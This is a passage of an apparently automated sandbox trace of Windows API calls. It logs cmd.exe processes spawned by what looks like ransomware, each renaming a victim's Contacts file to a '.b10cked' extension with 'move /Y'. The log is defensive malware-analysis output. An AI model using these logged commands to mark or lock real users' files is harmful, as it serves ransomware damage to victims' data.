lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegCloseKey (hKey=0x40) returned 0x0 [0219.521] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.521] srand (_Seed=0x5b8863b5) [0219.521] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" [0219.521] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" [0219.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.522] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.522] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.522] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.522] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.522] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.522] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.522] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.522] GetEnvironmentStringsW () returned 0x2c22d0* [0219.522] FreeEnvironmentStringsW (penv=0x2c22d0) returned 1 [0219.522] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.522] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.522] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.522] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.522] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.522] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0219.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.522] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f5e8, lpFilePart=0x22f5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f5e4*="Desktop") returned 0x18 [0219.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.523] GetEnvironmentStringsW () returned 0x2c2af0* [0219.524] FreeEnvironmentStringsW (penv=0x2c2af0) returned 1 [0219.524] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.524] GetConsoleOutputCP () returned 0x1b5 [0219.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) 
returned 1 [0219.528] GetUserDefaultLCID () returned 0x409 [0219.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f728, cchData=128 | out: lpLCData="1") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.529] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.530] GetConsoleTitleW (in: lpConsoleTitle=0x2b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0219.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.531] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.531] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.532] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.538] _wcsicmp (_String1="move", _String2=")") returned 68 [0219.538] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.538] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.538] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.538] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.538] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.538] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.540] GetConsoleTitleW (in: lpConsoleTitle=0x22f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.544] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.544] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.544] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0219.544] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.544] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.544] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.544] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.544] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.546] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f1dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f1d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f1d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.546] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.547] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.547] _wcsicmp (_String1="MNEUCU~1.CON", _String2=".") returned 63 [0219.547] _wcsicmp (_String1="MNEUCU~1.CON", _String2="..") returned 63 [0219.547] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\mneucu~1.con")) returned 0x20 [0219.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.548] SetErrorMode (uMode=0x0) returned 0x0 [0219.548] SetErrorMode (uMode=0x1) returned 0x0 [0219.548] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", nBufferLength=0x104, lpBuffer=0x22eb64, lpFilePart=0x22eb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", lpFilePart=0x22eb4c*="MNEUCU~1.CON") returned 0x26 [0219.548] SetErrorMode (uMode=0x0) returned 0x1 [0219.548] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.548] _wcsicmp (_String1="MNEUCU~1.CON", _String2=".") returned 63 [0219.548] _wcsicmp (_String1="MNEUCU~1.CON", _String2="..") returned 63 [0219.548] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\mneucu~1.con")) returned 0x20 [0219.548] SetErrorMode (uMode=0x0) returned 0x0 [0219.548] SetErrorMode (uMode=0x1) returned 0x0 [0219.548] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", nBufferLength=0x104, lpBuffer=0x22efe0, lpFilePart=0x22ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", lpFilePart=0x22ed78*="MNEUCU~1.CON") returned 0x26 [0219.548] SetErrorMode (uMode=0x0) returned 0x1 [0219.549] SetErrorMode (uMode=0x0) returned 0x0 [0219.549] SetErrorMode (uMode=0x1) returned 0x0 [0219.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", nBufferLength=0x104, lpBuffer=0x22f1e8, lpFilePart=0x22ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", lpFilePart=0x22ed78*="mneuc uhnfghgg.contact.b10cked") returned 0x38 [0219.549] SetErrorMode (uMode=0x0) returned 0x1 [0219.549] SetLastError (dwErrCode=0x0) [0219.549] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.b10cked")) returned 0xffffffff [0219.549] GetLastError () returned 0x2 [0219.549] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", fInfoLevelId=0x1, lpFindFileData=0x22e6f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6f4) returned 0x2b0e68 [0219.549] FindNextFileW (in: hFindFile=0x2b0e68, lpFindFileData=0x22e6f4 | out: lpFindFileData=0x22e6f4) returned 0 [0219.549] GetLastError () returned 0x12 [0219.549] FindClose (in: hFindFile=0x2b0e68 | out: hFindFile=0x2b0e68) returned 1 [0219.550] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2c1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1bd8) returned 
0x2b0e68 [0219.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", nBufferLength=0x104, lpBuffer=0x22e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", lpFilePart=0x0) returned 0x38 [0219.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", nBufferLength=0x104, lpBuffer=0x22e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", lpFilePart=0x0) returned 0x30 [0219.550] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact")) returned 0x20 [0219.550] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.b10cked"), dwFlags=0x3) returned 1 [0219.551] FindClose (in: hFindFile=0x2b0e68 | out: hFindFile=0x2b0e68) returned 1 [0219.551] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22e940 | out: _Buffer=" 1") returned 9 [0219.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.551] GetFileType (hFile=0x7) returned 0x2 [0219.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.632] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22e8cc | out: lpMode=0x22e8cc) returned 1 [0219.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.632] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22e900 | out: lpConsoleScreenBufferInfo=0x22e900) returned 1 [0219.632] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.633] FormatMessageW (in: 
dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x22e940 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.633] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22e924, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x22e924*=0x1a) returned 1 [0219.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.633] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.633] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.633] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.633] SetConsoleInputExeNameW () returned 0x1 [0219.634] GetConsoleOutputCP () returned 0x1b5 [0219.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.634] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.634] exit (_Code=0) Process: id = "569" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xf14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT 
AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32806 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32807 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32808 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32809 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32810 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32811 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32812 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32813 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32814 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32815 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32984 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32985 start_va = 0x20000 end_va = 0x2ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32986 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32987 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 32988 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 32989 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32990 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32991 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32992 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32993 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32994 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: 
